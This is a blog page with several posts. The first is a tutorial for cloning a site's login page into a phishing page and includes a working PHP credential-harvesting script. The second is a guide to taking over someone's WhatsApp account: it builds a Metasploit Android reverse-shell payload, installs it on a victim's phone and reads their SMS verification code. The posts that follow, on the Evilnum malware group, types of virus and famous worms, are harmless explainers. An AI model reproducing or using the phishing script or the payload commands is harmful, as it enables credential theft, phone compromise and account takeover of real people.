Breaking News

Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Tuesday, 15 September 2020

How To Create Phishing Page For Any Website (Easy Tutorial)

 In this tutorial am gonna teach you how to create your own Phishing pages for your desired websites , this tutorial is very easy but you must have some patient with little skills to do 


Also Read: What Is Phishing and How To Secure Your Accounts from This attack


As you know phishing requires some coding knowledge such as HTML, CSS, JavaScript and little PHP , if you don't have any idea about it then its very difficult to create your own Phishing Page 

If you have at least the basics of HTML then follow this tutorial to create your own Phishing page else leave this tutorial its not for you 

How To Create  Phishing Page Step By Guide


In order To create your own phishing page you have to find your target website , I mean you have to get the website's login portal 

Mostly people search for How To create phishing page for Facebook , in Facebook the login portal is visible in the main page so here you need not to find out the login page 

Here am Not Confusing you by writing too much 

If you want to create  phishing page for a particular website then open the website in a good web browser such as chrome 

If you want to create phishing page for Facebook then open facebook.com 

Then right click on mouse you will see a Option view source code then click on it 

Or you can directly press CTRL+U to see the source code 

Most of the people search for How To Create Your phishing page with android Mobile , there is no Source code viewer option so how to do 

to view source code of any website you can search for online source code viewers

But in android you can type view-source: 
In front of url to see the source code 
Eg:

View-Source:www.facebook.com


Now Copy all the Source code starting from <html> to the end tag of </html> 

Now open Notepad and paste the copied codes 

Now find the tag <form action="

And replace login.php in action 

Eg:

<form action="login.php"

Now save the file as index.html

In android you can use droid edit app to edit html  files 

copy below code and save it as
login.php

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("users.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

You can change facebook.com with any url 

Now create another file 

Don't write anything just save as users.txt  

Now you have all Done 

Just upload all the files ( index.html, login.php and users.txt )to a free web hosting server and make sure you give chmod 777 permission to users.text file

Finally This tutorial is only for educational purpose , we are not responsible for any misuse

How To Hack WhatsApp Using Termux

Hello guys, most of you're requested, so in this post am going to explain how you can use Termux to hack WhatsApp, let's see, can we really hack someone's WhatsApp account using Termux?

The fact is using SS7 in Termux is not possible and therefore we aren't going to do expirement with SS7 in Termux instead am going to tell you how you can hack using some available tools

Before we are proceeding you must know how to use Termux, if you're newbie then follow below link to know how to use Termux effectively for ethical hacking, or if you're familiar with Termux then you can install popular hacking tools in Termux

If you're interested to hack whatsapp using termux then there are some senerios you need to keep in mind

  •  Most of the times you need the OTP to verify WhatsApp
  • You and your victim must be connected to the same Wi-Fi(Spoofing Method)
  • Either you have to hack the victim Mobile somehow


Sounds terrible ☹️

how to hack a whatsapp account using termux

It's been a long time you are asking us how to hack other whatsapp using termux
hacking WhatsApp through Termux is little bit harder and the success rate is quite low,

Most of you guys are asking that how to use QRjacker in Termux,

Note that QRjacker is not working on Termux so we can use it on Termux if we install Kali Linux in Termux

So in this tutorial am going to tell you how to install Metasploit in Termux and generate a payload then install the payload to victim phone, then remote access to the phone over the internet

Let's see

Firstly install Termux

Then type below command to install Metasploit Framework

 apt update && apt upgrade && apt install unstable-repo && apt update && apt install metasploit && msfconsole


That's all, Metasploit Framework will be installed in Termux

Hack WhatsApp with Termux using Metasploit



Now you have to create a payload
For that type this command

 msfvenom -p android/meterpreter/reverse_tcp LHOST=ur IP LPORT=anyport -a dalvik --platform android R > /sdcard/appname.apk


Generate payload



In LHOST, you must specify your Local IP Address, you can get IP by typing ifconfig in Termux

In LPORT you can give any port

After hitting the following command
Now appname.apk file will be created on your sdcard

You can give any name but I have chosen appname

Now you have to install the APK file in your victim phone

After installation you can listen to it
For that you have to run Metasploit framework and type below command

 msfconsole -x “use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST your IP; run”


That's all, you can listen to it
You can do some stuff like accessing camera, Files, read contacts

Since we are going to hack WhatsApp, for that we have to install WhatsApp on our phone or we can use Parallel Space

during Registration you have to give your victim's phone number

Now the OTP will be sent to his/her mobile
It's time to use dump_sms command
After that it will create a .txt file which contains the SMS

Now you can use nano to read the message
And copy the code and use it for WhatsApp verification

That's all, in this way we can hack whatsapp using termux

Still have anything to ask then feel free to comment below

Evilnum Hackers Targeting Financial Firms With A New Python-based RAT

 Evilnum Hackers Targeting Financial Firms With A New Python-based RAT

An adversary known for targeting the fintech sector at least since 2018 has switched up its tactics to include a new Python-based remote access Trojan (RAT) that can steal passwords, documents, browser cookies, email credentials, and other sensitive information.

In an analysis published by Cybereason researchers yesterday, the Evilnum group has not only tweaked its infection chain but has also deployed a Python RAT called "PyVil RAT," which possesses abilities to gather information, take screenshots, capture keystrokes data, open an SSH shell and deploy new tools.

"Since the first reports in 2018 through today, the group's TTPs have evolved with different tools while the group has continued to focus on fintech targets," the cybersecurity firm said.

"These variations include a change in the chain of infection and persistence, new infrastructure that is expanding over time, and the use of a new Python-scripted Remote Access Trojan (RAT)" to spy on its infected targets.

Over the last two years, Evilnum has been linked to several malware campaigns against companies across the UK and EU involving backdoors written in JavaScript and C# as well as through tools bought from the Malware-as-a-Service provider Golden Chickens.


Back in July, the APT group was found targeting companies with spear-phishing emails that contain a link to a ZIP file hosted on Google Drive to steal software licenses, customer credit card information, and investments and trading documents.

While the modus operandi of gaining an initial foothold in the compromised system remains the same, the infection procedure has witnessed a major shift.

Besides using spear-phishing emails with fake know your customer (KYC) documents to trick employees of the finance industry into triggering the malware, the attacks have moved away from using JavaScript-based Trojans with backdoor capabilities to a bare-bones JavaScript dropper that delivers malicious payloads hidden in modified versions of legitimate executables in an attempt to escape detection. 

"This JavaScript is the first stage in this new infection chain, culminating with the delivery of the payload, a Python written RAT compiled with py2exe that Nocturnus researchers dubbed PyVil RAT," the researchers said.


The multi-process delivery procedure ("ddpp.exe"), upon execution, unpacks shellcode to establish communication with an attacker-controlled server and receive a second encrypted executable ("fplayer.exe") that functions as the next stage downloader to fetch the Python RAT.

"In previous campaigns of the group, Evilnum's tools avoided using domains in communications with the C2, only using IP addresses," the researchers noted. "While the C2 IP address changes every few weeks, the list of domains associated with this IP address keeps growing."


While Evilnum's exact origins still remain unclear, it's evident that their constant improvisation of TTPs has helped them stay under the radar.

As the APT's techniques continue to evolve, it's essential that businesses remain vigilant and employees monitor their emails for phishing attempts and exercise caution when it comes to opening emails and attachments from unknown senders.


Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post.

Thursday, 10 September 2020

What is a computer Virus | Types of viruses | How to be safe

 

What is a computer Virus | Types of viruses | How to be safe



1. what is a computer virus?

What is a computer virus? Basically, A computer virus is a malicious program that infects your computer. It uses files and folders as media to establish itself in your machine and spread. In the virtual world, the virus is extremely contagious since it can use a network to damage all the machines linked together: PC but also printers, internal servers, NAS, and any other connected device.

2. Definition of Computer Virus

  • It is encrypted so that the information it contains remains hidden. This is how malware masks its presence.
  • Polymorphism: it can take many forms and act in different ways. It is therefore more difficult to identify it and put it out of harm's way.
  • Metamorphism: here the computer virus modifies all of its structure and instructions. It thus becomes even more difficult to flush out and recognize.
  • Stealth: in this case the virus tricks your operating system and your antivirus. In this game, rootkit type malware is the most effective. There are different methods for tricking antiviruses, including erasing traces of its passage or directing the protection software towards an uninfected portion of the hard disk that the virus will have previously copied.

3. What do viruses do on your computer?

Damage caused by viruses can range from temporary computer malfunction to serious damage. In general, a virus can:
  • Send you links to unwanted sites;
  • Erase your data;
  • Spy on you by copying your personal information (passwords, emails, etc.) and send them to a third party;
  • Cause the computer system to overheat to the point of rendering the computer unusable.

4. Main types of computer viruses

Modern viruses fall into several categories. Each can have different types of objectives and attack techniques. Among the main ones, we highlight:

4.1 Keylogger


The keylogger is a type of virus whose main objective is to capture all the information that is typed on the computer. This data collection will be permanent and all information will be sent to the person responsible for distributing the malware. Thus, it is possible to collect data such as passwords for social networks, emails, and credit cards.

4.2 Ransomware


Ransomware is one of the worst types of today's computer viruses. Attacks carried out with this type of malware can cause great damage to companies, ranging from loss of critical data to financial values.

In addition, while the attack is being carried out, the establishment will not be able to perform its daily activities that depend on the computer system, which makes it vital to use techniques to prevent this type of threat.

The attack of a ransomware virus is done through a complex social engineering process. Hackers send messages to users of a corporate system, simulating real content and encouraging the download of an infected file. After opening the file, the malicious software scans the company's network, looking for loopholes that allow access to internal systems and private data.

Once this step is completed, all available information is encrypted and access to the data is blocked.

In order for the company to resume its activities, a payment (usually in bitcoin) of variable value is required. And if the company tries to release access to your data without payment, commands can be triggered to permanently delete files.

4.3 Spyware


Spyware is software that aims to capture information from users without their knowledge. As in the case of keyloggers, everything obtained is sent to the distributor of the infected files.

In general, this type of computer virus tracks a person's steps on the Internet and modifies the content of pages to display advertising that leads to the download of other types of computer viruses.

This is a feature that takes spyware to a higher level compared to the keylogger. In addition to capturing information such as passwords and credit card numbers, they can also modify computer settings and add additional software.

Its distribution can be done through fake websites, SPAM emails, and legitimate software, which are modified and published on pages that simulate famous program distribution sites.

4.4 Worms


Worms are a variant of viruses that became famous during the 2000s. They are characterized by their high ability to replicate on a network or set of computers without human interaction. In addition, they create additional copies of themselves inside the machines on which they are stored, making it difficult to completely remove them.

Despite being distributed using traditional techniques, such as spam messages and fake websites, worms gained strength by exploiting operating system flaws (especially Windows XP) that allowed automatic software to run through the pen-drive autorun. Thus, whenever a storage unit was connected to a new computer, the malware automatically installed itself on the system.

4.5 Trojan Horse


Trojan horses are among the most dangerous threats on the computer network. They disguise themselves as legitimate software so that, during their execution, other threats are installed on the user's computer.

Thus, exploiting flaws in the operating system, the hacker can control the machine, obtain personal data and even transform the device into a member of a zombie network (when the computer performs automated functions and is part of a network created to execute targeted attacks ).

4.6 Trojan Banking


It is a trojan characterized by access to bank details, shopping sites, social networks and email servers. Its attack is similar to the Trojan Horse, by sharing a file or software camouflaged as legitimate on infected pages or emails.

4.7 Blended Threats 


Also called compound threats, this type of computer virus is a combination of various malicious codes that can act as a large set of viruses simultaneously. This type of computer virus is able to reproduce itself, capture data, and allow the installation of other malware.

This type of software is distributed through fake emails and infected flash drives. Given their versatility, they can infect a wide range of devices and operating systems.

4.8 Adware


Adware or advertising malware is malware that can be easily identified. It presents itself as unwanted advertising. In some cases they are just annoying in others they undermine the security settings by tracking their activities to show ads where they generally would not have access.

4.9 Browser Hijacker


It is an unauthorized alteration of browser settings by malware. The home page and search pages are changed, display ads on legitimate sites, and redirect access to specific and malicious sites.

4.10 Rootkit


A rootkit is a trojan that integrates with the operating system, allowing access to the computer while hiding its files and processes in some parts of the system. A rootkit is able to give hackers administrative access to your device or your network without you realizing it.

This malware can be installed via commercial security products and application extensions. The use of some antiviruses can detect the behavior of rootkits but they must be deleted manually.

4.11 crossRAT


It is the newest computer virus discovered and is a dangerous threat to espionage characteristics. It can be found in several virtual environments that are considered safe in URLs that are shared without restriction over the web. CrossRAT makes a complete scan of your system allowing a hacker to send commands remotely to your PC, that is, he can spy and perform various activities on your machine.

5. How to be safe from viruses?


There are things you can do to avoid viruses, Install an antivirus program, Don't click on suspicious links or emails. Keep your operating systems and computer programs updated with the latest security patches.

6. How to remove a computer virus?

There are several ways to remove a computer virus depending on its dangerousness and the extent of the damage. First of all check that your antivirus is up to date. If it is not, perform the recommended update. In particular, the virus definitions of the program should be kept up to date. These are robot portraits of circulating viruses that allow the software to identify malicious intruders and notify you of their presence.

If you bought a new antivirus, don't let the two coexist. If you are under Windows 10 it is possible that you have Windows Defender activated. As native software, this program cannot be removed. However, you can deactivate it. To do this go to the Start menu> Settings> Update & security> Windows security> Virus and threat protection> Manage settings. If the switch is set to Real-time protection set it to Disable.



If your antivirus does not detect anything, despite obvious malfunctions, there is software without installation specialized in the identification of malware, horses of three, spyware, or attempts of pishing. They can be used without problems along with your antivirus to maximize your chances of success. We can cite ESET Online Scanner, with its one-time scan functionality, or Online Scan / Clean Tool from Trend Micro compatible with Windows 64 or 32 bit. The latter also makes it possible to analyze systems running Android.


6.1 Removal of Virus or Malware

Once your antivirus has detected the intruder, it will offer to remove it. And this deletion will erase all traces. But it is not always that simple. Especially if the malware causes significant malfunctions. In the most extreme cases you may have to entrust your computer to a professional, especially if nothing works. There is also a way to free yourself from malware, as long as you know a little about it. Here's the procedure to follow :

  • Save all of your data on an external medium: external hard drive for example. This step is fundamental to the risk of losing important information that you do not otherwise have.
  • Format your computer's hard drive. Keep in mind that this process deletes all of the data on it, including software. If you had programs, whether paid or free, make sure you have kept the installation CDs or can find them on the internet in the correct version.
  • Install your operating system again.

Several antivirus designers offer ISO standard software to disinfect an operating system. They are usually free like Kaspersky Rescue Disk or Ultimate Boot CD.


7. Top 5 Most Dangerous Computer Viruses


When we talk about a computer virus, we usually mean any kind of code designed to do harm and spread itself to more computers.

Viruses are created by malicious programmers who might want to use your computer to attack other targets or make money by stealing your personal information. They could also just be trying to see how far their virus will spread.

Different viruses can affect Windows, Mac OS, and Linux computers, and even data servers that keep companies, and the internet itself, running. Antivirus program help, but they can have trouble dealing with threats they've never seen before. 


Over the years, there have been thousands and thousands of viruses spread online, and they've caused billions of dollars of damage from lost productivity, wasted resources, and broken machines. A few dozen of the viruses stand out, some spread especially quickly, or affected a lot of people, or created a ton of damage all by themselves. Some did all of the above. 

Since a lot of viruses were very bad in a lot of different ways, it's hard to pick out which ones will objectively the worst. But with that in mind here are 5 those extra destructive viruses. These are snippets of code that changed the way people thought about computer security, both the people designing the viruses and people trying to protect them. So let's get started.


7.1 Melissa Virus


Say it's March 1999. You're an unsuspecting computer user who's never gotten a virus, let alone been trained to look for the signs that an email might be malicious. You get an email from someone you know, with a subject line that says it an important message. The message inside just says "Here's that document you asked for don't show it to anyone. 

The attachment is a Word document labeled "LIST" so you click on it because you're curious and a list of porn sites pops up. At this point, you realize that the email was probably some kind of virus. But it's too late, the first 50 people in your address book have already gotten a copy of the exact same email, with a subject list saying that the message is from you. That was the Melissa Virus.

The Melissa virus was spread through Microsoft's Outlook email program, and even though the attachment seemed like an innocent word document, it was able to infect the computer because of something called a macro. A macro is a specific kind of computer program that's used to create shortcuts. They're meant to make it easier to edit a document. Instead of making manually a set of changes to the document. Macro is the piece of code that would let you do with 1 click.


The problem is that functionality gives macros a lot of power over your computer. In just a few days, Melissa spread to hundreds of thousands of computers. It didn't do any damage to computers. But it did make an email service a slow way down and cost companies about $80 million overall.

The programmer behind this virus was David L.Smith, was caught about a week after Melissa was first released. He spends 20 months in prison and paid a $5000 fine. Why Melissa? Apparently, that was the name of a stripper he met in Florida.

7.2 I LOVE YOU VIRUS  


It was spread on 5 May 2000, was also successful because of social engineering, It reached around 45 million computers in just two days, and caused by $10 billion in damage. The infected mail had the subject line "I LOVE YOU", and came with the attachment title with "love letter for you.txt". 

When you click on the attachment the virus will go to your system's files looking for media like documents, images, and audio files. Then it would overwrite them with copies of itself, so if you didn't have your file backup, you'd lose all your data. Meanwhile, the virus would send itself to everyone in your address book. It was a type of virus called a worm, which means that it was a standalone program.

It looked like a text document but that virus file was actually a type of visual basic script which uses the file extension .vbs. Users couldn't see VBS at the end of the filename, though, because the windows OS that they were using was hiding file extension by default. Visual basic script sends your computers a set of instructions to execute. So if they're meant to cause harm it could be very dangerous.


The Virus was attributed to two programmers in the Philippines. But even though they were both arrested, they were realized at the time, there wasn't any law against what they'd done. 

7.3 SQL slammer


On 25 January 2003 just before 6 a.m, the internet broke. South Korea lost both internet and cell phone service. 300,000 people in Portugal couldn't connect to the internet. Airlines couldn't process tickets and had to cancel flights. Bank ATM's went down. 911 in Seattle had to start using paper to log calls. Even for a lot of devices that were still connected to the internet, the connections had become suddenly very slow, even by 2003 standards.

SQL Slammer was a worm that targeted SQL servers, which store databases using a piece of Microsoft software called. Microsoft SQL Server. It worked by taking advantage of a bug in the software it sends the server a specially formatted piece of code, one that looked like it was just an ordinary request for information, but actually reprogrammed the server to send out more copies of the same
worm. 

The worm spread faster than any other virus ever had, infecting 75,000 servers in just 10 minutes. Those servers were all sending requests to thousands of other servers, which couldn't handle all the traffic. In all millions of servers were affected, and the internet went kaput for a while.


Slammer is thought to have caused about $1.2 billion in damage before it was stopped, and the programmer behind it was never caught. The whole mess could have been prevented, though six months earlier, Microsoft released a fix for the bug but lots of people just hadn't installed it yet. 

7.4 Storm Worm 

On the 19 January, 2007 Storm worm was another worm that spread through email. But its purpose wasn't to destroy your computer or information, it wanted to take over your computer instead. The original subject line read "230 dead as storm batters Europe", which is where the virus gets its name.

But instead of an attachment, the email contained a link to a website, which promptly downloaded the virus onto the user's machine. Storm worm was designed to be as invisible as possible so that you wouldn't detect and destroy it. This way it was able to use your computer to do all kinds of stuff in the background.

The virus would connect your machine to a  botnet a collection of computers that form a network. But at first, the network didn't do actually very much, it just grew up. To make matter worse the anti-virus program had trouble finding a virus on an infected machine. The code form storm worm was designed to change every half hour, so it always looked different. They just sold the network to other criminals and scammers. After a while companies did figure out how to stop the virus from spreading. The people behind it were never caught.

7.5 Mebroot/Torpig


Mebroot is also a virus that slowly started to spread in 2007. And its main goal was also to hook you up with botnet called torpid. Both are especially sophisticated. It usually gets into your computer via a drive-by download, where you visit a malicious web page and the program starts to download in the background without you even knowing it. From there, it overwrites the master boot record. It is a part of your computer hard drive that stores the instruction that tells your computer how to start up. 


It can tell your computer what to do right from the start, And what it tells your computer is to connect to the torpid botnet which then steals all of your information. Torpig uses a spying technique known as Man-in-the-browser, which is creepy as it sounds. 

It lurks in your browser, logging everything you do and any private information you enter. It also tries actively to steal the information, using a fake website that looks and behaves exactly the same as the originals but sends the data to the torpid servers instead. By late 2008 torpid had stolen info connected to 500,000 bank accounts, and again the people who created it haven't been caught.